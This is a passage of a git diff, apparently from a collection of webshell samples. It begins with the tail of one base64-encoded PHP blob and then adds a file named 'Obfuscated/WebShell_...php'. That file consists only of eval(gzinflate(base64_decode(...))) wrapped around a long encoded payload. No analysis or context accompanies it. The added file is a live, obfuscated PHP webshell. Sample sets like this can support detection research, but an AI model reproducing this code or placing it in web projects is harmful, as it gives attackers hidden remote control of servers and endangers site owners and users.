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'\x29\x29\x29\x3B",".");?>
diff --git a/Obfuscated/WebShell_a679659c9efa3c899462f08c78755b1c04753f73.php b/Obfuscated/WebShell_a679659c9efa3c899462f08c78755b1c04753f73.php
new file mode 100644
index 0000000..b5aabf9
--- /dev/null
+++ b/Obfuscated/WebShell_a679659c9efa3c899462f08c78755b1c04753f73.php
@@ -0,0 +1,3 @@
+<?php
+eval(gzinflate(base64_decode("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")));
+?>
\ No newline at end of file